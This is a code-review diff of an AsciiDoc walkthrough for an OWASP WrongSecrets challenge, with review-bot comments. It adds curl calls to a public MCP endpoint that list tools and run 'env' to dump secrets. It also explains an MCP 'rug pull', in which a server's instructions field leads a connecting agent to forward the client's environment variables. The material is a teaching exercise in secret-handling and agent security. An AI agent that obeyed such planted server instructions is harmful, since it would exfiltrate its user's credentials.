27 changes: 26 additions & 1 deletion src/main/resources/explanations/challenge60.adoc
Expand Up @@ -22,6 +22,18 @@ curl -s -X POST http://localhost:8090/mcp \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
----

[%collapsible, title="when working from www.wrongsecrets.com"]
====

[source,bash]
----
curl -s -X POST https://www.wrongsecrets.com/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
----
====


Then, call the `execute_command` tool to retrieve environment variables and find the secret:

[source,bash]
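Review bot: the two consecutive blank lines after the closing `====` of the collapsible block (just before "Then, call the `execute_command` tool") break the single-blank-line spacing used between the other blocks in this file; drop one of them. The new collapsible also repeats the full `tools/list` curl with only the host changed, so if the JSON-RPC payload is ever edited, the local and www.wrongsecrets.com variants can drift apart; consider an AsciiDoc attribute such as `:mcp-url: http://localhost:8090/mcp` referenced as `{mcp-url}` inside the source block, or at least a reminder comment to keep both variants in sync.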
Expand All @@ -31,6 +43,19 @@ curl -s -X POST http://localhost:8090/mcp \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
----


[%collapsible, title="when working from www.wrongsecrets.com"]
====

[source,bash]
----
curl -s -X POST https://www.wrongsecrets.com/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
----
====


****
🤖 *Fun Fact — MCP Prompt Injection ("MCP Rug Pull"):*

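Review bot: spacing here is inconsistent with the first collapsible above: there are two blank lines before `[%collapsible, title="when working from www.wrongsecrets.com"]` and two after its closing `====`, while the first block is preceded by a single blank line. Reduce both to one. The title text is also repeated verbatim from the first block; if it is kept, capitalise it consistently in both places (e.g. `title="When working from www.wrongsecrets.com"`) so the rendered toggles match the surrounding prose.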
Expand All @@ -39,7 +64,7 @@ This MCP server goes one step further than just exposing env vars to passive cal
You can try this locally by doing the following:

1. run the container locally (e.g. `docker run -p 8080:8080 -p 8090:8090 ghcr.io/owasp/wrongsecrets/wrongsecrets-pr:pr-2400-7391231`)
2. setup an agent, using the mcp server "http://localhost:8090/mcp"
2. setup an agent, using the mcp server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online)
3. initialize the agent, and watch the logs of your container saying "MCP forward_env received exfiltrated client env data (XXX chars)", showing the MCP server received your env-vars.

This is known as the *MCP rug pull* or *MCP supply chain attack*, and it demonstrates why you should always review the `instructions` field of any MCP server you connect to before trusting it. Next, always make sure you only allow isolated processes without access to secrets to use MCP servers. Never call MCP servers directly from your terminal if sensitive ENV vars or files are present.
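Review bot: the parenthetical added to step 2, "(or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online)", leaves out what is leaked and to whom, which is exactly the point step 3 and the closing paragraph make: connecting an agent to that endpoint forwards the client's environment variables to the shared public instance. Spell that out and tie it to the advice at the end, e.g. `2. set up an agent using the MCP server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp", but only from an isolated environment whose env vars hold nothing sensitive: the server forwards your client's environment to the public instance)`. While touching the line, "setup" as a verb should be "set up", and the closing paragraph's "Never call MCP servers directly from your terminal if sensitive ENV vars or files are present" could mention that the same applies to the agent host, since it is the agent, not the terminal, that sends the environment in the flow described above.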